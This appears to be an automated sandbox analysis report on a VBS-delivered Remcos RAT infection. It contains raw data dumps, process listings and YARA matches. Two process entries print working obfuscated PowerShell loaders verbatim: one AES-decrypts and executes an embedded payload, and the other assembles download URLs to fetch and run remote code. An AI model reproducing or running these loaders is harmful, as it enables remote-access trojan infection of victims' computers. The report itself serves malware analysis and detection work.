                                                        2024-07-27 11:31:30 UTC610INData Raw: 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 77 2b 42 71 51 41 41 41 4e 6e 4a 32 65 54 72 55 4e 67 63 31 69 47 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 6d 32 59 50 63 2f 46 57 44 36 37 77 36 30 69 35 36 54 55 35 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55
                                                        Data Ascii: k5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTkw+BqQAAANnJ2eTrUNgc1iGzs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozm2YPc/FWD67w60i56TU5BQUFBQUFBQUFBQU
                                                        2024-07-27 11:31:30 UTC16384INData Raw: 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 51 2f 72 33 64 37 49 36 31 76 5a 61 2f 51 4f 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 67 63 4d 45 41 51 41 41 32 65 34 50 64 75 4c 72 54 66 54 53 65 44 37 4c 79 38 76 4c 79
                                                        Data Ascii: X19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19Q/r3d7I61vZa/QOmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYgcMEAQAA2e4PduLrTfTSeD7Ly8vLy
                                                        2024-07-27 11:31:30 UTC16384INData Raw: 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 51 2f 36 78 39 76 69 36 30 78 50 2f 34 42 4b 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 4f 64 41 50 64 2f 4d 50 66 74 37 72 55 45 59 48 76 30 63 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 44 34 56 79 2b 76 2f 2f 6d
                                                        Data Ascii: 39/f39/f39/f39/Q/6x9vi60xP/4BKFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWOdAPd/MPft7rUEYHv0cdHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dD4Vy+v//m
                                                        2024-07-27 11:31:30 UTC16384INData Raw: 74 46 68 30 5a 6c 72 47 57 6e 39 6e 50 56 57 38 70 38 37 54 59 73 78 73 58 31 54 42 42 44 4c 68 54 77 52 72 32 6c 63 78 44 4e 44 75 61 59 2f 6d 78 63 76 34 41 45 63 79 43 65 4f 74 6b 46 39 70 51 6a 75 48 46 66 48 31 47 41 4f 79 4e 35 57 44 62 39 31 51 77 73 4f 71 77 47 55 37 2b 74 33 51 53 57 76 4c 75 32 47 75 6c 70 62 55 65 58 2f 52 63 63 4c 4a 47 41 34 31 5a 33 39 48 50 4e 57 36 65 58 48 71 6d 69 4e 64 2b 71 72 66 4c 68 66 36 33 79 34 58 2b 74 38 75 46 2f 72 66 4c 68 66 36 33 79 34 58 2b 74 38 75 45 36 35 30 38 39 4a 76 52 2f 73 43 4c 4b 32 59 65 43 72 31 30 49 77 69 38 61 69 6a 46 65 44 71 71 2f 6e 58 74 30 79 36 7a 79 34 63 55 37 36 64 4b 4e 79 2f 30 6d 54 71 33 79 34 58 2b 74 38 75 46 2f 72 66 4c 68 66 36 33 79 34 58 2b 74 38 75 46 2f 72 66 4c 68 4a
                                                        Data Ascii: tFh0ZlrGWn9nPVW8p87TYsxsX1TBBDLhTwRr2lcxDNDuaY/mxcv4AEcyCeOtkF9pQjuHFfH1GAOyN5WDb91QwsOqwGU7+t3QSWvLu2GulpbUeX/RccLJGA41Z39HPNW6eXHqmiNd+qrfLhf63y4X+t8uF/rfLhf63y4X+t8uE65089JvR/sCLK2YeCr10Iwi8aijFeDqq/nXt0y6zy4cU76dKNy/0mTq3y4X+t8uF/rfLhf63y4X+t8uF/rfLhJ
                                                        2024-07-27 11:31:30 UTC16384INData Raw: 51 69 59 49 77 69 70 52 53 6b 2f 45 76 77 74 4c 63 49 59 4a 59 59 30 53 53 55 4c 41 50 53 51 4a 32 6c 59 49 34 63 37 62 5a 4c 4c 44 50 44 42 6d 42 67 73 2b 4d 6b 45 4f 42 31 4d 48 63 76 42 72 36 30 37 77 34 33 66 55 31 55 4d 4d 46 46 46 73 71 5a 6d 57 50 4c 51 53 39 71 62 77 67 30 44 6f 36 37 70 52 45 65 75 45 62 65 37 6e 42 79 56 50 51 41 2f 73 72 69 68 46 49 4d 70 4a 47 54 6a 53 30 78 6e 2f 70 76 71 47 43 47 4e 68 73 79 56 2f 54 4c 4f 66 51 77 4f 4f 42 2f 72 66 31 6b 6d 36 76 79 34 62 4d 55 78 74 69 38 38 46 70 72 2b 67 39 6a 46 54 73 67 64 39 57 61 6b 42 4c 6b 68 72 76 6e 73 74 73 44 4f 72 43 76 36 6a 51 52 45 76 35 4a 55 34 63 76 52 6d 43 4d 55 61 77 4a 52 53 77 5a 72 39 72 48 66 4c 44 6a 4a 42 50 6f 5a 6a 42 33 4a 67 4f 67 61 79 32 73 69 30 49 48 56
                                                        Data Ascii: QiYIwipRSk/EvwtLcIYJYY0SSULAPSQJ2lYI4c7bZLLDPDBmBgs+MkEOB1MHcvBr607w43fU1UMMFFFsqZmWPLQS9qbwg0Do67pREeuEbe7nByVPQA/srihFIMpJGTjS0xn/pvqGCGNhsyV/TLOfQwOOB/rf1km6vy4bMUxti88Fpr+g9jFTsgd9WakBLkhrvnstsDOrCv6jQREv5JU4cvRmCMUawJRSwZr9rHfLDjJBPoZjB3JgOgay2si0IHV
                                                        2024-07-27 11:31:30 UTC16384INData Raw: 36 76 34 79 43 2b 48 63 32 32 39 35 61 4e 4a 36 30 38 46 49 72 4a 45 49 6a 2b 30 4c 70 2b 45 61 33 79 37 76 74 69 6a 65 42 2f 39 58 59 71 4a 53 52 48 42 33 36 74 38 6d 69 35 2b 30 77 58 65 33 33 72 59 4a 47 58 61 52 64 57 4c 44 53 4f 2f 49 72 69 61 47 6b 30 56 30 78 50 54 73 72 4d 7a 4c 76 7a 31 43 46 47 31 78 53 32 4e 57 68 31 55 6d 5a 4a 31 70 76 2b 70 62 4b 33 74 59 37 68 62 66 6b 4b 4e 67 6a 79 72 4c 66 30 47 42 54 67 66 36 32 6a 57 43 42 43 4c 4d 54 2b 58 4c 35 69 75 7a 31 7a 45 45 56 39 36 46 54 32 70 50 30 68 67 45 53 67 65 37 4b 51 6d 50 4b 43 4f 62 6b 79 4a 4d 6a 36 48 64 59 37 7a 74 2f 4e 44 38 4f 7a 5a 73 67 38 64 50 4f 54 71 2b 36 34 6e 59 76 68 66 36 33 79 34 58 2b 74 38 75 46 2f 72 66 4c 68 66 36 33 79 34 58 2b 74 38 75 46 2f 72 61 61 38 57
                                                        Data Ascii: 6v4yC+Hc2295aNJ608FIrJEIj+0Lp+Ea3y7vtijeB/9XYqJSRHB36t8mi5+0wXe33rYJGXaRdWLDSO/IriaGk0V0xPTsrMzLvz1CFG1xS2NWh1UmZJ1pv+pbK3tY7hbfkKNgjyrLf0GBTgf62jWCBCLMT+XL5iuz1zEEV96FT2pP0hgESge7KQmPKCObkyJMj6HdY7zt/ND8OzZsg8dPOTq+64nYvhf63y4X+t8uF/rfLhf63y4X+t8uF/raa8W
                                                        2024-07-27 11:31:30 UTC16384INData Raw: 39 35 4e 43 65 51 63 77 74 51 43 73 70 33 4b 54 46 37 42 33 61 37 62 32 57 74 31 2f 6c 6f 6f 4a 46 37 56 65 44 66 4e 78 4b 7a 31 34 44 69 56 45 37 30 62 66 4e 66 70 4a 31 4e 7a 48 6d 34 4a 55 6f 44 42 59 76 2b 35 61 69 58 76 2f 66 4c 73 62 68 67 32 5a 6e 7a 6c 4e 69 39 39 2f 4d 70 75 61 33 4a 59 56 64 6c 63 74 45 31 2f 30 69 51 6d 50 4f 74 59 4c 32 78 4c 46 79 55 4c 42 6a 32 42 39 2f 74 59 4c 30 6e 51 62 53 72 2b 32 35 6f 6d 61 54 6b 66 42 6b 6f 4e 4a 31 30 39 45 52 36 68 6e 76 67 64 54 2b 4a 79 5a 75 44 6c 51 64 6a 6e 77 59 62 31 4b 37 45 36 4c 2b 71 65 71 4f 31 37 7a 55 6e 59 4e 5a 47 6f 58 39 63 38 33 63 71 4a 53 33 79 43 42 65 74 77 75 46 2f 52 54 44 73 65 36 32 69 43 55 41 58 38 4f 48 32 4f 43 6a 67 66 36 32 69 57 52 51 47 64 64 35 4b 2b 4b 6d 6f 4d
                                                        Data Ascii: 95NCeQcwtQCsp3KTF7B3a7b2Wt1/looJF7VeDfNxKz14DiVE70bfNfpJ1NzHm4JUoDBYv+5aiXv/fLsbhg2ZnzlNi99/Mpua3JYVdlctE1/0iQmPOtYL2xLFyULBj2B9/tYL0nQbSr+25omaTkfBkoNJ109ER6hnvgdT+JyZuDlQdjnwYb1K7E6L+qeqO17zUnYNZGoX9c83cqJS3yCBetwuF/RTDse62iCUAX8OH2OCjgf62iWRQGdd5K+KmoM
                                                        2024-07-27 11:31:30 UTC1536INData Raw: 59 59 54 31 6d 56 42 6d 53 6e 4a 45 39 61 66 71 33 79 58 69 31 54 4d 65 54 37 64 6e 4d 57 36 4d 30 73 75 52 6b 6f 4b 32 43 51 35 6d 4f 32 53 31 73 32 53 2f 35 43 68 4f 79 35 68 66 4d 61 39 42 42 4a 34 48 2b 74 57 73 61 48 4b 44 41 6d 66 41 6a 7a 61 34 75 55 4f 6d 42 4d 77 78 38 6f 37 69 7a 42 79 59 33 4f 63 47 42 55 34 5a 59 4a 75 79 6b 67 5a 61 55 6b 64 77 5a 2b 72 66 4a 5a 6b 77 56 46 74 52 6c 61 4d 42 65 46 67 4c 58 33 58 38 33 48 69 68 63 39 65 74 53 31 56 2f 57 64 47 56 6f 31 36 2f 43 73 4d 57 72 36 53 76 50 68 66 32 72 78 41 69 67 32 2b 6d 42 55 38 2f 35 38 55 46 6f 77 72 6d 39 6c 6e 57 42 4d 4a 61 4d 2f 5a 53 7a 42 55 6c 76 44 46 57 57 4a 4b 52 55 6d 2b 76 7a 77 34 58 39 49 6f 42 68 4d 4b 54 4a 67 79 76 7a 77 34 58 2b 4c 2b 5a 7a 44 2b 6b 31 6d 66
                                                        Data Ascii: YYT1mVBmSnJE9afq3yXi1TMeT7dnMW6M0suRkoK2CQ5mO2S1s2S/5ChOy5hfMa9BBJ4H+tWsaHKDAmfAjza4uUOmBMwx8o7izByY3OcGBU4ZYJuykgZaUkdwZ+rfJZkwVFtRlaMBeFgLX3X83Hihc9etS1V/WdGVo16/CsMWr6SvPhf2rxAig2+mBU8/58UFowrm9lnWBMJaM/ZSzBUlvDFWWJKRUm+vzw4X9IoBhMKTJgyvzw4X+L+ZzD+k1mf


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:07:30:55
                                                        Start date:27/07/2024
                                                        Path:C:\Windows\System32\wscript.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\createdthingstobefrankwithmeeverywhere.gIF.vbs"
                                                        Imagebase:0x7ff6a6300000
                                                        File size:170'496 bytes
                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:2
                                                        Start time:07:30:55
                                                        Start date:27/07/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
                                                        Imagebase:0x7ff7be880000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.2109299164.000001B1E188F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.2109299164.000001B1E188F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000002.00000002.2109299164.000001B1E188F000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.2109299164.000001B1E269C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.2109299164.000001B1E269C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000002.00000002.2109299164.000001B1E269C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:3
                                                        Start time:07:30:55
                                                        Start date:27/07/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:4
                                                        Start time:07:31:01
                                                        Start date:27/07/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                        Imagebase:0x8a0000
                                                        File size:65'440 bytes
                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.3265268792.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        General

                                                        Target ID:5
                                                        Start time:07:31:07
                                                        Start date:27/07/2024
                                                        Path:C:\Windows\SysWOW64\wscript.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs"
                                                        Imagebase:0x2e0000
                                                        File size:147'456 bytes
                                                        MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        General

                                                        Target ID:6
                                                        Start time:07:31:08
                                                        Start date:27/07/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yrfptuyewdgikkwbbqnxbflydidjpkpem"
                                                        Imagebase:0x1c0000
                                                        File size:65'440 bytes
                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:7
                                                        Start time:07:31:08
                                                        Start date:27/07/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yrfptuyewdgikkwbbqnxbflydidjpkpem"
                                                        Imagebase:0xca0000
                                                        File size:65'440 bytes
                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:8
                                                        Start time:07:31:08
                                                        Start date:27/07/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jmlaun"
                                                        Imagebase:0xec0000
                                                        File size:65'440 bytes
                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:9
                                                        Start time:07:31:09
                                                        Start date:27/07/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\tgqsvxbzg"
                                                        Imagebase:0xb30000
                                                        File size:65'440 bytes
                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:10
                                                        Start time:07:31:11
                                                        Start date:27/07/2024
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl 